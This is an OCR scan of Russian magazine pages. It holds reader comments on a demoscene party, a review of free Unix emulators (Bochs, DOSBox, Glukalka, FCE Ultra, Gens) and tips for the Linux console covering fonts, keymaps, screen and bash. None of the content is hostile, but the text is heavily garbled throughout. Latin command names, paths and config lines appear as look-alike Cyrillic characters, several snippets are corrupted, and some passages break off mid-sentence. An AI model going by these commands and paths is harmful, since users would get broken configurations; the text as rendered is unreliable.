лом свете - прим. тіпбѵѵОгк). 

а Имя: Оля 
а Возраст: 1 8 
а Город: Питер 
а Коммент: умница-красавица 
Меня пригласил мой парень, сказал, что 
будет интересно. Я вообще не особо раз- 
бираюсь в компьютерах, так что не могла 
по достоинству оценить всю красоту этих 
«дем». Но на летающие узорчики посмот- 
реть было интересно. Запомнилось, как ка- 
кой-то мальчик ругал другого прямо на 
сцене. Зря он так, мне кажется, неправиль- 
но выносить свои обиды на публику. С ин- 
тересом посмотрела на старые компьюте- 
ры, посмотрела фильм про демосцену. На 
некоторых компо было немного скучновато, 
но у Антона там много знакомых и мы об- 
щались с ребятами. Сценеры - милые, при- 
ятные люди. Немножко замороченные на 
компьютерах, но у каждого свои замороч- 
ки. Так что я ничуть не пожалела, что 
пришла. 

а Ник: Тоха 
а Возраст: 21 
а Город: Питер 

а Коммент: штатный юниксоид :)) 
Понравилось не столько само действо, 
столько обстановка. Без серьезных накла- 
док, но и без лишнего пафоса. Народ об- 
щался, легко шел на контакт, то ли маги- 
ческое «Мы из Хакера» действовало, то ли 
ребята действительно готовы общаться, 
пускать на сцену, все рассказывать и пока- 
зывать :). Что же касается самих работ и 
вообще сцены, то это, честно говоря, не 
мое. Для них золотые годы - конец 80-х, 
«Спектрумы» и «Амиги», меня же, как зако- 
ренелого юниксоида, тянет поностальгиро- 
вать по 70-м, по РОР и ѴАХ'ам, по АТ&Т 
ІІИІХ и ВЗЭ. Но тем не менее, огромный 
респект этим ребятам, писать на асме дем- 
ку, укладываясь в отведенные килобайты, 
это, конечно, не ядро хакать, но тоже весь- 
ма достойно :). ЗС 
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тот обзор посеящен эмуляции о Ипях различных устройств - от целого компьютера до игровой консоли. Все, кроме Ніпе - о нем и так 
часто пишут. Из принципа высокой морали коммерческие эмуляторы я тоже трогать не буду, только свободное ПО. Начнем. 

ЭМУЛИРУЕМ В ІІМІІХ ВСЕ, НТВ ТОЛЬКО МОЖНВ ЭМУПИРВВПТЬ 




А В0СН8 

О ержать в арсенале виртуаль- 
ный компьютер архитектуры 
х86 не только оригинально, но 
и полезно. ВосМз (произносит- 
ся как «бокс») является чистым 
эмулятором, то есть не ис- 
пользует виртуализацию. Тех- 
нология виртуализации приме- 
няется в таком популярном 
продукте, как ѴМѴѴаге. Грубо говоря, виртуа- 
лизация позволяет использовать реально су- 
ществующие ресурсы компьютера, разделяя 
их между основной системой и системой-гос- 
тем. В ѴМѴѴаге процессор не эмулируется, а в 
ВосГіз - эмулируется, поэтому ВосГіз весьма 
тормозит. С другой стороны, полная эмуля- 
ция позволяет запускать ВосГіз на компьюте- 
рах с архитектурами, отличными от х86. Нап- 
ример, на порте ВосГіз для РоскеІРС люди за- 
пускают даже ѴѴіпсІоѵѵз 95 и 98. 

ВосГіз эмулирует ВСЕ: ВІОЗ, дисковые 
контроллеры, видяху - все железо. Поэтому 
на ВосГіз можно исследовать, не опасаясь 
ничего, какие-нибудь вирусы и прочие дест- 
руктивные явления. Хотя, разумеется, его 
функциональность этим не исчерпывается. 

Устанавливать ВосГіз лучше из исходника, 
чтобы заточить именно под твою систему. В 




общем случае для включения всех парамет- 
ров оптимизации на этапе конфигурирова- 
ния надо задать дополнительный ключ: 

# УсопЛдиге --епаЫе-аІГорііішаііоп$ 

# таке 

# таке іпзіаіі 

После компиляции нужно, во-первых, ско- 
пировать конфиг программы в твою домаш- 
нюю директорию. Конфиг .Ьосбзгс лежит в 
директории исходника ВозсГі . Теперь созда- 



дим виртуальный 
винчестер. Даем ко- 
манду «Ьхітаде». 

Тебя спросят, что 
именно создавать - 
винт или флоп? 

Винт. Просто нажи- 
маем Епіег. Вхітаде 
задает новый воп- 
рос: а какого типа 
винчестер? Отвеча- 
ем: РІаІ На следую- 
щем этапе вводим 
размер винта в ме- 
габайтах. Например, 
350. И затем - его 
имя. Пусть будет 
с.ітд. Утилита создает в текущей директо- 
рии файл с именем с.ітд, а кроме того, вы- 
водит в консоль строку с параметрами соз- 
данного винчестера: аІаО-тазІег: {уре=(М, 
раШ=”с.ітд”, тобе=М, суІіпсІег5=71 1 , 
ГіеасІ5=1 6, зр{=63. 

Эту строку надо скопировать в буфер об- 
мена и вставить в конфиг Восііз'а, заменив 
ею оригинальную строку, относящуюся к аІаО- 
тазіег. Теперь можем отформатировать вир- 
туальный винт и установить некую систему. В 
конфиге выбираем, с чего загружаться - с 
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СПЕЦИ0ПИ30ЦИЯ- ЭМУЛЯЦИЯ 



СО-ВОМ'а. Перед запуском эмулятора СО в 
приводе должен быть подмонтирован! Рас- 
комментируем строку ЬооГ сбгот. И заком- 
ментируем все остальные ЬооТстроки. Рас- 
комментируем строку аІаО-зІаѵе: Іуре=ссІгот, 
раІЬ=/сІеѵ/ссІгот, зМиз=іпзеі1есІ. Вставляем 
СО, запускаем командой ЬосЬз. 

Потом, при запросе режима работы - снова 
Епіег. Идет обычная загрузка виртуального 
компьютера с СО. Допустим, ты засунул в си- 
дюк какой-нибудь загрузочный диск, с которо- 
го можно запустить систему и некие систем- 
ные утилиты. Создаем разделы на виртуаль- 
ном винте, форматируем их, устанавливаем 
систему на винт, затем комментируем ЬооЬ 
ссігот и снимаем комментарий с ЬооГ с. 

В ходе экспериментов я устанавливал 
обычную ООЗ, ѴѴіпсІоѵѵз 98 ЗЕ и бЬІІІ/ипих 
ОеЬіап 3.0. Кроме того, я попытался запус- 
тить и РгееЗВІЕ (это такой І_іѵе-дистрибу- 
тив на основе РгееВЗО), однако он не за- 
пустился, повергнув эмулятор в панику в 
прямом смысле слова: Еѵепі Іуре: РАМС. 
ВосМз тут же спросил, что ему делать 
дальше - умереть, выдать согебитр или 
продолжить эмуляцию? Я выбрал Продол- 
жить, однако не помогло - пришлось выби- 
рать біе. Остальные три системы установи- 
лись и заработали. 

Надо сказать, что особого раздражения не 
вызвала только 003 - поставил ты ее коман- 
дой зуз с: и пользуйся. А вот ОеЬіап и 
ѴѴіпбоѵѵз устанавливались невероятно мед- 
ленно, как и работали. Поэтому ВосЬз я могу 
рекомендовать только для работы в голом 
ООЗ'е, и то именно для работы, а не для иг- 
рушек, т.к. все, что связано с таймингом, в 
ВосЬз работает не так, как положено. 



Для управления скоростью работы эмуля- 
тора в конфиге есть ключ ІРЗ. Он отвечает 
за количество выполняемых в 1 секунду опе- 
раций. Выбор должен зависеть от мощности 
твоего компа. По сути, чем выше ІРЗ, тем 
тормознее работает ВосЬз, ежели не может 
обеспечить должное количество инструкций 
в 1 секунду. Однако слишком низкое значе- 
ние ІРЗ тоже тормозит работу. 

Резюме. ВосЬз хорош для запуска фидош- 
ного софта под 003, запуска каких-нибудь 
старых компиляторов вроде ТигЬоРазсаІ и 
т.д. А для архаичных игр лучше выбрать сле- 
дующий в этом обзоре продукт. 

А ООЗВОХ 

Хотя ООЗВох базируется на коде ВосЬз, для 
работы ООЗВох не нужно создавать никаких 
виртуальных винчестеров. Более того, не надо 
и устанавливать какую-либо систему. ООЗВох 
является эмулятором компьютера и М3 003 
одновременно, а работает с 003-программами 
на твоем обычном, не виртуальном жестком 
диске. В простейшем случае запуск ООЗВох 
выглядит так: «бозЬох имя _директории». 

В итоге переданная в качестве параметра 
директория монтируется внутри ООЗВох как 
диск С, и ты можешь работать с ней как с 
обычным досовским диском. Надо сказать, я 
не пробовал ничего деструктивного, то есть 
Тбізк не запускал, ТогтаГом не игрался. 
ООЗВох нацелен на обычные игры. Удел 
ООЗВох - досовские игры, как очень древ- 
ние, так и относительно более продвинутые, 
под ОРМІ-режим фООМ и иже с ним). 

Скорость работы игр ощутимо выше, чем 
в ВосЬз, однако некоторые игры в ВосЬз идут 
(если эти рывки можно назвать «идут»), а в 



ООЗВох - нет. Например, РгеЬізІогік 2 в 
ООЗВох вылетел на первом уровне - дескать, 
мало памяти (что отнюдь не является исти- 
ной). А в ВосЬз кое-как, но работал. Что до 
другого шедевра от ТіШз - игры Еох, то в 
ООЗВох не работала система, выдающая 
уникальные пароли для разных компьютеров. 

В ООЗВох я запускал и нормально играл в 
АІопе Іп Оагк 1 , 2. Во все части Оиезі Рог ОІогу, 
кроме пятой, разумеется (она под ѴѴіпсІоѵѵз 9х). 
ООЗВох эмулирует звуковую карту, включая 
поддержку МЮІ. При работе с АІ_ЗА никаких 
нареканий по этому поводу не возникло. Прав- 
да, звук может начать рваться, если ты будешь 
разгонять ООЗВох, однако при дефолтной ско- 
рости эмулятора все в порядке. Сами же игры 
идут плавно и без напряга - разумеется, в пре- 
делах мощности процессора. Потому что бо- 
лее «современные» игры, такие как Негейс или 
Нехеп, на моем АіЫоп ХР 1 500 уже тормозили 
самым гнусным образом. 

Настраивается ООЗВох через текстовый 
конфиг. Чтобы его сгенерировать, надо из 
сессии ООЗВох'а вызвать утилиту сопйд.сот 
(она лежит на диске 2, который является в 
ООЗВох виртуальным), и не просто так выз- 
вать, а следующим образом: «сопТід -ѵѵгііе- 
сопТ сІозЬох.сопк 

Конфигурационный файл бозЬох.сопТ будет 
записан в текущей директории, и в нем отра- 
зятся текущие установки ООЗВох. Внутри 
ООЗВох есть, кроме сопйд.сот, еще ряд полез- 
ных утилит, среди которых - ІоасІТіх. Она позво- 
ляет выделить запускаемой программе опреде- 
ленное количество килобайт памяти, и не более 
того. Формат таков: ІоасІТіх -1024кж.ехе. 

В этом примере запускается Тох.ехе, кото- 
рый видит только 1024 килобайт оперативки. 
Кстати, можно заниматься даже своеобраз- 
ным оверклокингом ООЗВох. Для этого су- 
ществуют сочетания клавиш СТВ1_-Р1 1/Р1 2. 
Они уменьшают и увеличивают скорость 
эмуляции, так что если какая-то игра тормо- 
зит, можно попробовать ее таким образом 
ускорить. Как и в случае с ВосЬз, если пере- 
борщить, то вместо ускорения получится за- 
медление, так что разгоняй ООЗВох сооб- 
разно с возможностями твоего компа. 

Итак, в образе ООЗВох получаем вирту- 
альный компьютер по скорости примерно 
как древний 386-ой и наслаждаемся играми 
той эпохи. А кто хочет залезть в еще более 
седую старину, тому прямая дорога к эмуля- 
тору, о котором рассказано ниже. 

А сшшкп 

Лично я в полной мере ощутил прелесть 
Зіпсіаіг только в эмуляторе. Мой железный 
Зіпсіаіг был самодельный и очень старый, 
поэтому я не мог запускать, например, "сов- 
ременные" игры и т.д. 

В І_іпих я нашел эмулятор себе по вкусу - 
ОІикаІка, который создан россиянином 
Дмитрием Санариным. Для установки требу- 
ется І_еззТіГ ОІикаІка эмулирует 7Х Зресігит 
48К, 1 28К, Репіадоп 1 28К и Зсогріоп 256К, 
бипер, музыкальный сопроцессор АУ-3-89 12, 
джойстики типов Кетрзіоп, Сигзог и Зіпсіаіг, 
поддерживает все популярные форматы 
снапшотов, умеет работать с настоящей маг- 
нитной лентой, а еще может делать дамп 
звука во внешний файл. 

В дистрибутив, кроме исходника эмулято- 
ра, выходят также четыре РЮМ -файла с про- 
шивками 2Х Зресігит 48К и 1 28К, Репіадоп 




ЭМУЛЯЦИЯ 8ІІРЕВ ЛШЕШ 

П ожалуй, наиболее технически продвинутой игровой кон- 
солью на рынке аналогичных 16-битных устройств была и ос- 
тается 5ЫЕ5. Только по официальным данным объем ее продаж 
составил 48 млн. экземпляров. Мощной приставке нужен и мощ- 
ный эмулятор. Таковым является 25ЫЕ5 (ѵѵѵѵѵѵ.гзпез.сот). Он 
многоплатформенный - работает в Ыпих, ѴѴіпсІоѵѵз и Э05. Осна- 
щен приличным графическим интерфейсом, не привязанным к 
какому-либо движку виджетов. Конек 25ЫЕ5 - его качество. Эму- 
лятор очень стабильный - на моей памяти он ни разу не вылетал. 
Графика плавная, по крайней мере, при использовании рендера 
ОрепОЦ как в полноэкранном, так и в оконном режимах. 




л ЬосЬз. зі.пеі 
л сІозЬох.зГпеі 
л діикаіка.зі.пеі 
^ІсеиІІга.зІ.пеІ 
л зі.пеі/ргоіесіз/ 
депзО 

іші». ркпеі.сот/ 
Чое/сІдеп-зсІІ.ЫтІ 
л ѵѵш/.здиізЬ.пеІ/ 
депегаіог/ 
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1 28К и Зсогріоп 256К. Переключение между 
ними осуществляется либо через конфиг, 
либо в окне Зейіпдз на странице 
АгсММиге. Можно управлять скоростью 
эмулируемого процессора. По умолчанию он 
работает на частоте 3.5 Мбі. При этом ты 
можешь обнаружить к Зресігит'у даже игры 
с голосом (Вазрийп, Мах Неасігоот) и впол- 
не приличной приставочной графикой. 

Л РСЕ ІЛ.ТВП 

Один из наиболее активно развивающихся 
эмуляторов МЕЗ/Ратісот. Нашим людям 
больше известны игровые приставки Эепсіу, 
2ЫІйопд (дизайн которого походил на ЗЕОА 
Медасігіѵе, а на корпусе гордо красовалась 
надпись: «16 Ьіі») и т.д. На самом деле все 
это - клоны японской 8-битной МЕЗ, то бишь 
Міпіепсіо Епіеііаіптепі Зузіет. В самой Япо- 
нии это устройство носило имя Ратісот (от 



Ратііу Сотрігіег). В странах бывшего СССР 
его разновидности стали популярны в сере- 
дине - конце девяностых годов прошлого 
столетия, но остальной мир знаком с ИЕЗ 
еще с 1 983 года. В этом самом остальном 
мире было продано 62 миллиона штук ИЕЗ. 
Вероятно, это была самая популярная прис- 
тавка за всю историю их существования. 

РСЕ Шга более чем достойно эмулирует 
ИЕЗ как на *М IX- платформе, так и под 
ѴѴіпсІоѵѵз. Но я буду говорить только о вер- 
сии, запускаемой мною под І_іпих. Собирает- 
ся из исходника без проблем, надо только 
иметь установленный ЗОІ_ с беѵеі-пакетами. 

Из железа РСЕ Шга эмулирует практичес- 
ки весь оригинальный МЕЗ, включая даже 
2аррег - световой пистолет. Его роль играет 
мышь. Эмуляция джойпада, на мой взгляд, 
не вполне удобна: ѵѵ, а, з, г - крестовина, 

ТАВ - Зеіесі, Епіег - Зіаіі, Кеураб 2 - В, 
Кеураб 1 - А. Под Кеураб подразумеваю кла- 
виши на цифровой части клавиатуры. 

Поддерживаются также игры с батарейка- 
ми, вроде Кіпдз Оиезі или Іттогіаі. Незави- 
симо от того, реализовано сохранение в са- 
мой игре или нет, в РСЕ Шга есть возмож- 
ность сэйва/загрузки состояния игры (в сло- 
ты), записи и воспроизведения фильмов, 
создания скриншотов. Нет дампа звука во 
внешний файл. Как я уже говорил, в І_іпих- 
версии отсутствует какой-либо графический 
интерфейс, что, впрочем, не является недос- 
татком. Все манипуляции с РСЕ Шга произ- 
водятся с помощью командной строки, а 
сохраняются автоматически в конфиге при- 
чудливого формата (текстовым редактором 
его изменять определенно не следует). 

Общие впечатления от эмулятора исключи- 
тельно положительные, разве что не хватает 
настройки клавиш управления. Атак - полный 
порядок. Я запустил в РСЕ Шга почти 250 игр. 



Общие впечатления от эмулятора 
исключительно положительные. 




Л СЕМ8 

Игровая консоль ЗЕОА Медасігіѵе (ЗЕОА Оепезіз 
в США) была у нас так же популярна, как и кло- 
ны МЕЗ. Моторолловский процессор 68000 
СРІІ (как в старых Макинтошах) и прочая более 
современная начинка потеснили МЕЗ на рынке 
приставок вплоть до выхода Зирег Міпіепсіо, ко- 
торый, впрочем, в пост-СССР так и не достиг 
популярности ЗЕОА Медасігіѵе и МЕЗ. В 
Медасігіѵе мы снова встречаем старого знако- 
мого - процессор 280, теперь он обрабатывает 
исключительно звук. Кроме 280, за звук в 
Медасігіѵе были ответственны и другие устрой- 
ства, например 6-канальный Уатаііа'вский РМ- 
синтезаторѴМ2612. 

Все это и многое другое в той или иной 
мере отлично эмулирует Сепз. Сепз облада- 
ет развитым графическим интерфейсом, а 
конфиг этого эмулятора представляет собой 
обычный іпі-подобный файл. Сепз умеет 
сохранять/загружать состояние игры. Более 
того, поддерживаются сэйвы от других эму- 
ляторов, таких, как Сепесузі (мощный эмуль 
для ООЗ) и ОСеп. 

В отличие от некоторых других эмулято- 
ров, Сепз поддерживает ромы игр, сде- 
ланные для разных стран и телевизионных 
стандартов (Эарап N130, 113А N130, 

Еигоре РА1_, барап РАЦ. Можно выбрать 
один из нескольких рендеров - 2хЗАІ, 
МогтаІ, ОоиЫе, Зсапііпе, ІпіегроІаіесІ и 
т.д. Нет ОрепСЬрендера. Таковой присут- 
ствует, впрочем, в ОСеп'е и активируется 
ключом -С, т.е. «бдеп -С 800x600 имя 
файла», где вместо 800x600 надо поста- 
вить нужное тебе разрешение. Зато в 
Сепз есть окошко настроек контраста и 
яркости, что довольно удобно. 

В меню имеется пункт дампа звука во 
внешний ѴѴАѴ-файл, однако пункт этот не- 
доступен. Возможно, в ѴѴіпбоѵѵз-версии си- 
туация иная. Сепз эмулирует также ЗЕСА- 
СЭ, но проверить это его свойство я не смог 
- просто у меня нет таких дисков. Эмуляция 
джойпада на высоте - можно переназначать 
клавиши управления для клавиатуры. Встро- 
енный Сате Сепіе позволяет патчить игру во 
время ее выполнения. 

Из негативных моментов могу отметить 
ухудшение качества звука при всех ренде- 
рах, отличных от МогтаІ. Если тебе нужен 
быстрый полноэкранный рендер и при 
этом хороший звук, то рекомендую все-та- 
ки использовать ЭСеп. Либо, как альтерна- 
тива, скачай себе Сепегаіог. Очень быстр, 
с плавным скроллингом, может даже запи- 
сывать АѴГшки. Но версия под СТК/ЗОЬ не 
поддерживает полноэкранный режим. Во- 
обще говоря, Сепегаіог дает наиболее 
приятное ощущение «играбельности», не- 
жели Сепз и Эдеп, вот только пользова- 
тельский интерфейс не самый удобный, 
например, сэйвы не сохраняются в при- 
вычные по другим эмулям слоты, и надо 
вручную выбирать файл. 

Мне сложно сказать, какому эмулятору 
МедаЭгіѵе следует отдать предпочтение. Я бы 
выбрал Сепз, если бы не было проблем со 
звуком. А в Сепегаіог'е при неповоротливости 
его интерфейса очень плавная горизонтальная 
прокрутка, прямо как в оригинальной 
МедаЭгіѵе. Эдеп - крепкий середняк. Возмож- 
но, надо остановиться именно на нем. ЗС 
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И ногда бывает интересно почитать дискуссии на некоторых форумах. Вопрос: «О как бы мне увидеть список папок на диске?» - и 
ответ: «Запускаешь коіщиеюі...». Намек ионит? Виндузятники начинают пересаживатьсн на «модный» линукс и паникуют, не находя 
привычного интерфейса. Что касается командной строки, то для них она становится чем-то ужасно неудобным и морально 
устаревшим. Надеюсь, ты не относишься к их числу и знаешь о настоящей мощи ЦНІХ-консопи, а чтобы чувствовать себя бопее уверенно и 
комфортно, читай этот материал. 



ПРИЕМЫ ЭФФЕКТИВНОЙ РОБОТЫ В КОНСОПИ 




^ИТРК.НРЧИНРЕМ 

О ля начала хочу заметить, что 
русификацию в этой статье 
я рассматривать не буду, 
об этом и так немало сказано, 
поэтому предполагается, 
что локаль у тебя настроена, 
русские буквы видно везде 
и с вводом русского текста 
также все в порядке. Также, 
чтобы сберечь твое драгоценное зрение 
и вообще улучшить внешний вид консоли, 
рекомендую настроить ТгатеЬиЯег или вос- 
пользоваться пакетом ЗѴОАТехІМосІе. 



А ВВОД И ВЫВОД 

Первым делом нам необходимо установить 
приличные шрифты и настроить раскладку кла- 
виатуры. Для этого будем использовать пакет 
кЬсІ и набор русских шрифтов сопзоіе-іооіз- 
сугііііс. В этом пакете, в каталоге рсТ, лежат кон- 
сольные шрифты. Их необходимо скопировать 
в /изг/зІіаге/кЬсІ/сопзоІеІопТз. Самыми подходя- 
щими шрифтами для консоли, на мой взгляд, 
являются шрифты семейства ІІпіСуг, например 
ІІпіСуг-запз-8х16. Скопируем их в приведенный 
выше каталог и выполним следующую команду: 



# $еНопі ІІпіСуг-$ап$-8х16 



Для того чтобы шрифт устанавливался 
при загрузке системы, необходимо подпра- 
вить загрузочные скрипты. 

Так, с выводом разобрались, теперь зай- 
мемся вводом. Мы настроим раскладку кла- 
виатуры, для этого можно использовать 
стандартную карту клавиш ги.тар для рус- 
ско-английской клавиатуры. Тогда раскладка 
будет переключаться клавишей аК, но эта 
клавиша, как известно, довольно часто бы- 
вает нужна при работе, при этом на клавиа- 
туре имеется совершенно бесполезная для 
линуксоида клавиша ѵѵіпсіоѵѵз, поэтому на 
нее и повесим переключение раскладки. Для 
этого нам понадобится утилита зМоѵѵкеу из 
пакета кЬсІ. Запускаем ее, нажимаем по по- 
рядку левый аК, правый аК, левый ѵѵіп, пра- 
вый ѵѵіп, меню (рядом с правым ѵѵіп) и ждем 
1 0 секунд, чтобы программа завершилась. 

После завершения работы зііоѵѵкеу открыва- 
ем /изг/зІпаге/кЬсІ/кеутарз/і386/дѵѵег1у/ги . тар . дг 
(предварительно следует распаковать), нахо- 
дим строку «кеусобе 56 = АІЮг Іоск» и пи- 
шем вместо нее «кеусобе 56 = АН», проде- 
лываем то же самое с кеусобе 1 00. А вот та- 
кими должны быть остальные клавиши: с ко- 
дом 125 (левый ѵѵіп) - «кеусобе 125 = АІЮг», 

126 (правый ѵѵіп) - «кеусобе 126 = АІЮг» и 

127 (меню) - «кеусобе 127 = АІЮг Іоск». 



Сохраняем ги.тар и правим загрузочные 
скрипты, если необходимо. Отныне времен- 
ное переключение раскладки (пока нажата 
клавиша) будет происходить по клавишам 
ѵѵіп, а постоянное - по клавише «Меню». 

А КОНТРОЛЬ НПДТЕРМИНППОМ 

Замечательная утилита зейегт предоставля- 
ет нам широкие возможности по управлению 
терминалом. В данный момент нас интере- 
суют следующие: -ТогедгоипсІ (цвет симво- 
лов), -ЬаскдгоипсІ (цвет фона), -іпѵегзезсгееп 
(реверс цветов), -Ыапк [0-60] (тайм аут 
перед гашением экрана), -сІеТаиІІ: (установки 
по дефолту). Например, хотим мы увидеть 
синие буквы на белом фоне. Нет проблем, 
выполняем: 

$ $еііегт -ТогедгоипсІ Ыие -ЬаскдгоипсІ ѵѵЬііе -$іоге 

Ключ -зТоге нужен для сохранения всех 
внесенных изменений. 

А ПРОЗДНИК В КОНСОПИ 

Наконец, пришло время поговорить об од- 
ной из самых полезных программ для рабо- 
ты в консоли - зсгееп. Эта программа суще- 
ственно упрощает жизнь юниксоида. Это 
настоящий оконный менеджер для консоли, 
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ХПРДКОРНЫЕ РПЗБОРКИ с консолью 




| Работа двух приложений в зсгееп 



очень удобный и многофункциональный. Но 
услышав про оконный менеджер, не нужно 
сразу представлять себе иксовый диспетчер 
окон. Зсгееп предоставляет возможность 
создавать внутри одного терминала несколь- 
ко терминалов (окон). Таким образом, заре- 
гистрировавшись на одном терминале, мож- 
но работать с множеством приложений од- 
новременно, при этом можно разделить од- 
но окно на два и работать в двух окнах сра- 
зу. Можно сделать так, чтобы нижнюю стро- 
ку терминала занимала строка состояния, в 
которой будет отображаться время, дата, те- 
кущие окна, загрузка процессора и т.д. Мож- 
но назначить горячие клавиши для запуска 
часто используемых приложений, которые 
будут открываться в отдельном окне. 

С установкой никаких проблем быть не 
должно, т.к. зсгееп можно найти в любом 
дистрибутиве в виде бинарного пакета. Для 
того чтобы со зсгееп было действительно 
удобно работать, необходимо добавить в 
конфиг несколько строк. Глобальный конфиг 
зсгееп'а хранится в /еіс/зсгеепгс, а в роли 
персональных конфигов пользователей выс- 
тупают файлы -/.зсгеепгс. Пример конфига 
можно взять в каталоге еіс из тарболла с ис- 
ходниками. 



$ ѵі -/.зсгеепгс 



# долой приветствие 
$іагіир_те$$аде оГГ 

# показывать мигание экрана вместо писка динамика, шан- 
сы стать эпилептиком резко снизятся 

ѵЬеІІ оп 

# размер буфера прокрутки 
беГзсгоІІЬаск 1000 

# волшебная строка 
зІіеШІе '$ |$Іі' 

# создавать Іодіп-шелл 
зііеіі -$$НЕП 

# строка состояния 

ІіагсШиз Іазіііпе "%{+Ь Й} %с %0 %(1 %М %У $ШАМЕ 
:%Н %=[%»]" 

# по клавише Е$с создать окно и запустить в нем команду 
$и 

Ьіпб \033 зсгееп -Іп -і гооі 9 $и 



С помощью опции ЬіпсІ можно переназна- 
чить дефолтные комбинации клавиш или по- 
весить запуск определенных команд на ком- 
бинации клавиш. Синтаксис ее предельно 
прост: «ЬіпсІ клавиша команда». Но следует 
учитывать, что все комбинации в зсгееп 
должны начинаться с комбинации сігі+а, т.е. 
запись «ЬіпсІ Т' зсгееп ТеісМтаіІ -ѵ» означает: 
«нажать комбинацию сігі+а, затем нажать 
клавишу Р для того, чтобы запустить в новом 
окне {еІсЬтаіІ (для запуска приложений в от- 
дельных окнах их следует указывать как ар- 
гумент команды зсгееп)». Упрощенно эта 
комбинация записывается как С-а Р. Однако 
при переназначении клавиш не забывай, что 
многие комбинации уже используются для 
управления самим зсгееп'ом. Теперь погово- 
рим об управлении программой, так сказать, 
в реальном времени. 



Некоторые десролтные комбинации клавиш в зсгееп 



С-а 0..9 - переход между окнами 0..9 
С-а " - показать список всех окон 
С-а зрасе - перейти в следующее окно 



рамм и окружения (проще говоря, 
ЬеІасЬ/геайасЬ - прим. ред.). Например, те- 
бе необходимо срочно отлучиться, тогда 
можно отсоединиться от зсгееп, сделать 
Іодоиі, затем вернуться, вновь зайти под 
своим логином, восстановить работу зсгееп 
и продолжать заниматься своими делами. 

Еще одна полезная возможность зсгееп - 
наблюдение за окном (С-а М), когда зсгееп 
сообщает о любой активности в этом окне. 
Вся прелесть в том, что можно установить 
наблюдение за одним окном и при этом за- 
ниматься своими делами в другом. 

Все, зсгееп установлен и настроен, те- 
перь создадим более благоприятные усло- 
вия для его использования. Настроим за- 
пуск зсгееп сразу после входа пользователя 
в систему, для этого добавим в конец 
/еіс/ргойіе строки: 

# ѵі /еіс/рго(іІе 



ІГ [ "'ііу'" = "/беѵ/ѵс/Г ];іііеп 
ІГ [ -х /изг/Ьіп/зсгееп ]; Шел 
зсгееп -К; Іодоиі 



Хочу обратить твое внимание на строку 
зІіеІІМІе '$ |зИ, за счет которой имя работа- 
ющего в окне приложения отображается ря- 
дом с номером окна. Например, сейчас у 
меня в строке состояния можно увидеть [ О 
зГі 1 * етасз 2 тіктосі 3 тий ] - это зна- 
чит, что текущим является первое окно, в ко- 
тором запущен редактор етасз, также в ос- 
тальных трех окнах выполняются оболочка 
ЬазИ (0), проигрыватель трекерной музыки 
тіктосі (2) и почтовик тий (3). Но чтобы эта 
опция работала, необходимо в /еіс/ргоТіІе 
добавить строку: 

ехрогі РВОМРШММАМ = ’есію -п -е "\033к\033\134 ,и 



С-а Ьаскзрасе - перейти в предыдущее окно 

С-а с - создать новое окно 

С-а к - уничтожить текущее окно 

С-а С-а - перейти в предыдущее окно 

С-а 3 - разделить экран на два региона по горизонтали 

С-а ТаЬ - переход между регионами 

С-а г - склеить два разделенных региона 

С-а сі - отсоединиться от зсгееп 

С-а М - начать наблюдение за текущим окном 

С-а ? - справка обо всех комбинациях клавиш 

Нажатие С-а 6 вызывает нечто вроде за- 
вершения работы зсгееп, хотя на самом де- 
ле он засыпает и после повторного запуска 
с ключом -г полностью восстанавливает сес 
сию и работу всех запущенных тобой прог- 



8СНЕЕИ И ПЕРЕМЕНИМ ТЕКИ 

Е сли ты используешь зсгееп с опцией «зГіеІІ -$5НЕІ_І_», убери из 
/еІс/ргоТіІе инициализацию переменной ТЕРМ, иначе при 
открытии нового окна ТЕРМ вместо значения зсгееп будет при- 
нимать значение, прописанное в /еІс/ргоТіІе (чаще всего Ііпих), и 
приложения будут работать неправильно. 



Я 

Я 



Эта запись означает, что зсгееп должен 
запускаться на первом терминале сразу пос- 
ле входа пользователя и, по возможности, 
с восстановлением первой беШГной сес- 
сии, а после выхода из зсгееп должен про- 
исходить Іодоиі 




из 










Теперь, когда у нас есть зсгееп, зачем 
нам 6 терминалов? Будет достаточно и одно- 
го, с запущенным в нем зсгееп'ом. Поэтому 
идем в /еІс/іпійаЬ, находим строки вроде 
этой: «сі :1 235:гезраш:/зЫп/адеНу 38400 
йуі Ііпих». Закомментируй четыре из шести 
таких строк (запасной терминал оставим на 
случай непредвиденных ситуаций и прог- 
рамм, конфликтующих со зсгееп'ом). 

...Здесь редактор не удержался и от себя 
добавил пару хинтов по использованию зсгееп: 

О. Копирование и вставка в текстовом 
режиме. СІгІ+а С1гІ+[ - этой комбинацией 
клавиш осуществляется переход в режим ко- 
пирования. Указательными клавишами выби- 
раем начало текста, зажимаем пробел, выде- 
ляем область для помещения в буфер и еще 
один раз жмем на пробел (если все сделал 
правильно, то появится сообщение: СоріесІ 
31337 сЬагасІегз іпіо ЬиНег). Для вставки из 
буфера переходим в нужное место и после- 
довательно нажимаем СІгІ+а С1гІ+]. 

О. СІгІ+а Іі - создание текстовых скриншо- 
тов, очень полезная фича, посмотреть полу- 
ченный результат можно так: «Іезз МагсІсору.Х», 
где X - это номер текущего окна зсгееп. 

А БОШ НО БОШ 

Вот и добрались наши руки до самого важ- 
ного компонента любой ШМІХ-консоли - ин- 
терпретатора команд (далее просто зМеІІ). 
Существует большое количество различных 
зИеІГов, отличающихся как по возможностям 
(от легкого и быстрого азМ до тяжелого и 
многофункционального 23Іі), так и по синтак- 
сису. Самым популярным на сегодняшний 
день является ЬазЬ, который вобрал в себя 
лучшие возможности других интерпретато- 
ров, его твикингом мы сейчас и займемся. 

О. Настоятельно рекомендую использо- 
вать аііаз'ы. Например, хочется тебе, чтобы 
по команде «I» выполнялась команда «Із -I - 
соІог=аІѵѵауз», нет проблем: пишем в 
-/.Ьазіігс строку: «аііаз І='1з -I -со1ог=а1шуз'». 
Сделай такие псевдонимы для всех часто ис- 
пользуемых команд, а также для команд, в 
написании которых ты обычно совершаешь 
досадные ошибки: «аііаз дгер- дегр'». 

О. Очень удобно, чтобы в историю ко- 
манд не заносились такие команды как 1д, 

Ьд, Із, а также повторы команд. В общем, 
чтобы не засорять файл -/.ЬазЬЬізІогу, до- 
бавь в ~/. Ьазіігс: «ехроіі 
НІЗТЮМОРЕ=«&:Із:[Ь1]д»». Здесь амперсанд 
(&) означает повторяющиеся команды. 

®. Не многие знают, что помимо пере- 
менной РАТН, в которой хранятся пути поис- 
ка бинарников, есть еще переменная 
СЭРАТН, хранящая разделенные двоеточием 
пути поиска каталогов. Добавь в -/-Ьазіігс: 
«ехроіі С0РАТН=«/изг/5гс:/изг/5Ііаге/сІос»». 



